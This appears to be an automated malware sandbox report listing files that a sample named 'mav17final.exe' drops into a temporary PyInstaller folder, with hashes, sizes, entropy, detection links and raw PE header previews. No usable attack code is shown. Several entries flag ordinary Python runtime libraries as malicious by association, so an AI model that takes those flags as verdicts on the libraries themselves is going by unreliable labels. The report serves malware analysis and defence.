                                                Size (bytes):109392
                                                Entropy (8bit):6.641929675972235
                                                Encrypted:false
                                                SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.Win64.SpywareX-gen.27721.19030.exe, Detection: malicious, Browse
                                                • Filename: access_version_x32-64_pack.exe, Detection: malicious, Browse
                                                • Filename: , Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: Arceus.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.FileRepMalware.5539.23420.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):84760
                                                Entropy (8bit):6.570831353064175
                                                Encrypted:false
                                                SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                MD5:3859239CED9A45399B967EBCE5A6BA23
                                                SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: file.exe, Detection: malicious, Browse
                                                • Filename: access_version_x32-64_pack.exe, Detection: malicious, Browse
                                                • Filename: , Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: Wave32bit.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: Arceus.exe, Detection: malicious, Browse
                                                • Filename: DeltaX.exe, Detection: malicious, Browse
                                                • Filename: W1dMSoIHTz.exe, Detection: malicious, Browse
                                                • Filename: W1dMSoIHTz.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ...".....^......L........................................P.......`....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_ctypes.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):123664
                                                Entropy (8bit):6.058417150946148
                                                Encrypted:false
                                                SSDEEP:3072:c7u5LnIx1If3yJdqfLI2AYX5BO89IPLPPUxdF:cwxfijqfLI29BO8VF
                                                MD5:BD36F7D64660D120C6FB98C8F536D369
                                                SHA1:6829C9CE6091CB2B085EB3D5469337AC4782F927
                                                SHA-256:EE543453AC1A2B9B52E80DC66207D3767012CA24CE2B44206804767F37443902
                                                SHA-512:BD15F6D4492DDBC89FCBADBA07FC10AA6698B13030DD301340B5F1B02B74191FAF9B3DCF66B72ECF96084656084B531034EA5CADC1DD333EF64AFB69A1D1FD56
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........G...&...&...&...^...&...Z...&...Z...&...Z...&...Z...&..$Z...&...^...&...^...&..-Z...&...&...&..$Z...&..$Z...&..$Zv..&..$Z...&..Rich.&..........................PE..d...!..d.........." ..."............p\..............................................|o....`.........................................pP.......P.........................../..............T...........................`...@............................................text............................... ..`.rdata...l.......n..................@..@.data...$=...p...8...^..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_decimal.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):253200
                                                Entropy (8bit):6.559097478184273
                                                Encrypted:false
                                                SSDEEP:6144:7t9gXW32tb0yf6CgLp+E4YECs5wxvj9qWM53pLW1Apw9tBg2YAp:7ngXW3wgyCiE4texvGI4Ap
                                                MD5:65B4AB77D6C6231C145D3E20E7073F51
                                                SHA1:23D5CE68ED6AA8EAABE3366D2DD04E89D248328E
                                                SHA-256:93EB9D1859EDCA1C29594491863BF3D72AF70B9A4240E0D9DD171F668F4F8614
                                                SHA-512:28023446E5AC90E9E618673C879CA46F598A62FBB9E69EF925DB334AD9CB1544916CAF81E2ECDC26B75964DCEDBA4AD4DE1BA2C42FB838D0DF504D963FCF17EE
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nyR.............w.......s.......s.......s.......s.......s.......w.........._....s.......s.......s.......s.......s......Rich............PE..d......d.........." ...".v...<......L...............................................Rn....`..........................................T..P...`T...................&......./......P.......T...........................P...@............................................text....u.......v.................. ..`.rdata..<............z..............@..@.data....*...p...$...R..............@....pdata...&.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B........................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_elementtree.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):128272
                                                Entropy (8bit):6.398685534751033
                                                Encrypted:false
                                                SSDEEP:3072:uhGlNy/CPxvpewUjYk2f2/4YkWQNokUVrm/54h7ZIP6fxpxZ:P4/CPxvpTFk2fNKQqYx4h7r
                                                MD5:53BA094149F6FC5F4F7349D4E0019857
                                                SHA1:17F8FB2487D2DEDB2BC1595CC8DEDE2C9BCAD4F9
                                                SHA-256:EDB86A361198E68DFEEC10B8BEF6937540F43A4578356FD2F13546DE03471026
                                                SHA-512:10D1714E1CF41981EF7DA99713AD5B7C8647A13813A9012A69C4B5BB1542C4F5C170175A2CD49D94D79B5D10F71BBBA5732245C1D6DF1F35AB6ADB79F9A1D6F5
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............I..I..I.4I..I...H..I...H..I...H..I...H..I...H..I...H..I..Id.I...H..I...H..I..XI..I...H..IRich..I........................PE..d......d.........." ...".(..........Px..............................................h.....`......................................... ...X...x...x......................../......X....K..T............................I..@............@...............................text....'.......(.................. ..`.rdata...g...@...h...,..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_hashlib.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):65304
                                                Entropy (8bit):6.222786912280051
                                                Encrypted:false
                                                SSDEEP:1536:6TO+CPN/pV8ETeERZX/fchw/IpBIPOIVQ7SygPx:mClZZow/IpBIPOIVQyx
                                                MD5:4255C44DC64F11F32C961BF275AAB3A2
                                                SHA1:C1631B2821A7E8A1783ECFE9A14DB453BE54C30A
                                                SHA-256:E557873D5AD59FD6BD29D0F801AD0651DBB8D9AC21545DEFE508089E92A15E29
                                                SHA-512:7D3A306755A123B246F31994CD812E7922943CDBBC9DB5A6E4D3372EA434A635FFD3945B5D2046DE669E7983EF2845BD007A441D09CFE05CF346523C12BDAD52
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F.u.'.&.'.&.'.&._,&.'.&.[.'.'.&.[.'.'.&.[.'.'.&.[.'.'.&._.'.'.&*[.'.'.&.'.&e'.&*[.'.'.&*[.'.'.&*[@&.'.&*[.'.'.&Rich.'.&........PE..d......d.........." ...".T...~......`?...............................................%....`.............................................P.......................,......../......\...0}..T............................{..@............p..(............................text...uR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_lzma.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):158992
                                                Entropy (8bit):6.8491146526380025
                                                Encrypted:false
                                                SSDEEP:3072:A4lirS97HrdVmEkGCm5hAznf49mNo2NOvJ02pIPZ1wBExN:VlirG0EkTVAYO2NQ3w
                                                MD5:E5ABC3A72996F8FDE0BCF709E6577D9D
                                                SHA1:15770BDCD06E171F0B868C803B8CF33A8581EDD3
                                                SHA-256:1796038480754A680F33A4E37C8B5673CC86C49281A287DC0C5CAE984D0CB4BB
                                                SHA-512:B347474DC071F2857E1E16965B43DB6518E35915B8168BDEFF1EAD4DFF710A1CC9F04CA0CED23A6DE40D717EEA375EEDB0BF3714DAF35DE6A77F071DB33DFAE6
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........*...D,..D,..D,...,..D,..E-..D,..A-..D,..@-..D,..G-..D,M.E-..D,..E-..D,..E,.D,M.I-..D,M.D-..D,M.,..D,M.F-..D,Rich..D,........PE..d...$..d.........." ...".b...........5....................................................`..........................................%..L...\%..x....p.......P.......>.../......8.......T...........................p...@............................................text....a.......b.................. ..`.rdata..............f..............@..@.data........@......................@....pdata.......P......................@..@.rsrc........p.......2..............@..@.reloc..8............<..............@..B................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_socket.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):79640
                                                Entropy (8bit):6.290841920161528
                                                Encrypted:false
                                                SSDEEP:1536:0JltpedXL+3ujz9/s+S+pzpMoiyivViaE9IPLwj7SyZPx:07tp4i3ujz9/sT+pzqoavVpE9IPLwjHx
                                                MD5:1EEA9568D6FDEF29B9963783827F5867
                                                SHA1:A17760365094966220661AD87E57EFE09CD85B84
                                                SHA-256:74181072392A3727049EA3681FE9E59516373809CED53E08F6DA7C496B76E117
                                                SHA-512:D9443B70FCDC4D0EA1CB93A88325012D3F99DB88C36393A7DED6D04F590E582F7F1640D8B153FE3C5342FA93802A8374F03F6CD37DD40CDBB5ADE2E07FAD1E09
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......RXY..97..97..97..A...97.YE6..97.YE2..97.YE3..97.YE4..97..E6..97..96..97.]A6..97..E:..97..E7..97..E...97..E5..97.Rich.97.................PE..d... ..d.........." ...".l...........%.......................................P......V.....`.............................................P............0....... ..x......../...@..........T...............................@............................................text...:k.......l.................. ..`.rdata...t.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\_ssl.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):161040
                                                Entropy (8bit):6.029728458381984
                                                Encrypted:false
                                                SSDEEP:3072:LMaGbIQQbN9W3PiNGeA66l8rBk3xA87xfCA+nbUtFMsVjTNbEzc+pIPC7ODxd:LMaG0bN96oG1l8YA8ZMSR+E
                                                MD5:208B0108172E59542260934A2E7CFA85
                                                SHA1:1D7FFB1B1754B97448EB41E686C0C79194D2AB3A
                                                SHA-256:5160500474EC95D4F3AF7E467CC70CB37BEC1D12545F0299AAB6D69CEA106C69
                                                SHA-512:41ABF6DEAB0F6C048967CA6060C337067F9F8125529925971BE86681EC0D3592C72B9CC85DD8BDEE5DD3E4E69E3BB629710D2D641078D5618B4F55B8A60CC69D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....8..p.......p.......p.......p.......p..N....p...p...q.......p..N....p..N....p..N.T..p..N....p..Rich.p..........................PE..d...'..d.........." ..."............l+..............................................NS....`.............................................d...t........`.......P.......F.../...p..8...0...T...............................@............................................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..8....p.......8..............@..B................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\base_library.zip

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                Category:dropped
                                                Size (bytes):1438373
                                                Entropy (8bit):5.59108786847922
                                                Encrypted:false
                                                SSDEEP:24576:mQR5pATu7xm4lUKdcubgAnyfbcZ0iwhBdYf9P3sRHHL:mQR5plxmQJy
                                                MD5:2F6D57BCCF7F7735ACB884A980410F6A
                                                SHA1:93A6926887A08DC09CD92864CD82B2BEC7B24EC5
                                                SHA-256:1B7D326BAD406E96A4C83B5A49714819467E3174ED0A74F81C9EBD96D1DD40B3
                                                SHA-512:95BCFC66DBE7B6AD324BD2DC2258A3366A3594BFC50118AB37A2A204906109E42192FB10A91172B340CC28C12640513DB268C854947FB9ED8426F214FF8889B4
                                                Malicious:false
                                                Preview:PK..........!.h%..b...b......._collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\libcrypto-1_1.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):3445016
                                                Entropy (8bit):6.099467326309974
                                                Encrypted:false
                                                SSDEEP:98304:+/+YgEQaGDoWS04ki7x+QRsZ51CPwDv3uFfJx:MLgEXGUZ37x+VZ51CPwDv3uFfJx
                                                MD5:E94733523BCD9A1FB6AC47E10A267287
                                                SHA1:94033B405386D04C75FFE6A424B9814B75C608AC
                                                SHA-256:F20EB4EFD8647B5273FDAAFCEB8CCB2B8BA5329665878E01986CBFC1E6832C44
                                                SHA-512:07DD0EB86498497E693DA0F9DD08DE5B7B09052A2D6754CFBC2AA260E7F56790E6C0A968875F7803CB735609B1E9B9C91A91B84913059C561BFFED5AB2CBB29F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........).h.z.h.z.h.z..Oz.h.z...{.h.z...{.h.z...{.h.z...{.h.z.h.zjh.z...{.h.z=..{.h.z=..{.j.z=..{.h.z=.#z.h.z=..{.h.zRich.h.z........................PE..d.....wd.........." ..."..$...................................................5......o5...`..........................................y/..h...J4.@.....4.|....p2......b4../....4..O..P.,.8.............................,.@............@4..............................text...$.$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata..h....p2.......1.............@..@.idata..^#...@4..$....3.............@..@.00cfg..u....p4.......3.............@..@.rsrc...|.....4.......3.............@..@.reloc...y....4..z....3.............@..B................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\libffi-8.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):39696
                                                Entropy (8bit):6.641880464695502
                                                Encrypted:false
                                                SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\libssl-1_1.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):704792
                                                Entropy (8bit):5.55753143710539
                                                Encrypted:false
                                                SSDEEP:12288:ihO7/rNKmrouK/POt6h+7ToRLgo479dQwwLOpWW/dQ0T9qwfU2lvzA:iis/POtrzbLp5dQ0T9qcU2lvzA
                                                MD5:25BDE25D332383D1228B2E66A4CB9F3E
                                                SHA1:CD5B9C3DD6AAB470D445E3956708A324E93A9160
                                                SHA-256:C8F7237E7040A73C2BEA567ACC9CEC373AADD48654AAAC6122416E160F08CA13
                                                SHA-512:CA2F2139BB456799C9F98EF8D89FD7C09D1972FA5DD8FC01B14B7AF00BF8D2C2175FB2C0C41E49A6DAF540E67943AAD338E33C1556FD6040EF06E0F25BFA88FA
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........q...q...q.....q..p...q..p...q..t...q..u...q..r...q.[.p...q...p.u.q.[.u...q.[.q...q.[.....q.[.s...q.Rich..q.........................PE..d.....wd.........." ...".D...T......<.....................................................`..........................................A...N..@U..........s........N......./......h.......8...............................@............@..@............................text....B.......D.................. ..`.rdata.../...`...0...H..............@..@.data...AM.......D...x..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............l..............@..@.rsrc...s............n..............@..@.reloc..q............v..............@..B................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\psutil\_psutil_windows.cp311-win_amd64.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):68608
                                                Entropy (8bit):5.960057524881486
                                                Encrypted:false
                                                SSDEEP:1536:Owy3DdmqfowPqaeMIBKwYx4CaeEQQoPT:cLeMIBKwYx4CaeEQQo
                                                MD5:5F3B6D0A76CC2F72539CAB35221DDCC6
                                                SHA1:14FE99DB2C22E10C467244B146FAD20DD158585B
                                                SHA-256:73295D501366010C478070ABB2ECB6455CB8BBF2D162731428ECC33CECDECC67
                                                SHA-512:6BCEAB82530B688AE78D9A68E24105574046925901E0A4456F155DB6B18BBB36507363538BB07278D8D2769673F746932E0A468C7D3ADE1EE4D2502C088AFCEB
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:M..~,..~,..~,..wTU.t,..,Y..|,..,Y..r,..,Y..v,..,Y..z,..P..|,..jG..o,..~,...,..Y..r,..Y...,..Y9..,..Y...,..Rich~,..........PE..d...s.ye.........." .........p...............................................P............`.............................................p...@...@....0....... ...............@..........................................8............................................text............................... ..`.rdata..0P.......R..................@..@.data...8...........................@....pdata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\pyexpat.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):199448
                                                Entropy (8bit):6.377510350928234
                                                Encrypted:false
                                                SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                MD5:9C21A5540FC572F75901820CF97245EC
                                                SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5..I.5..M.5.5..5..I.5..I.5..I...5..I.5.Rich.5.................PE..d......d.........." ..."............0........................................ .......=....`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\python311.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):5762840
                                                Entropy (8bit):6.089392282930885
                                                Encrypted:false
                                                SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ...".X%..47.....\H........................................\.......X...`...........................................@......WA......p[.......V.d0....W../....[..C....).T.............................).@............p%..............................text...rV%......X%................. ..`.rdata.......p%......\%.............@..@.data.........A..L...hA.............@....pdata..d0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......rV.............@..@.reloc...C....[..D...|V.............@..B........................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\select.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):30480
                                                Entropy (8bit):6.578957517354568
                                                Encrypted:false
                                                SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                MD5:C97A587E19227D03A85E90A04D7937F6
                                                SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\_MEI19682\unicodedata.pyd

                                                Download File
                                                Process:C:\Users\user\Desktop\mav17final.exe
                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                Category:dropped
                                                Size (bytes):1141016
                                                Entropy (8bit):5.435086202175289
                                                Encrypted:false
                                                SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".@..........P*...............................................!....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cekke4h5.2ee.ps1

                                                Download File
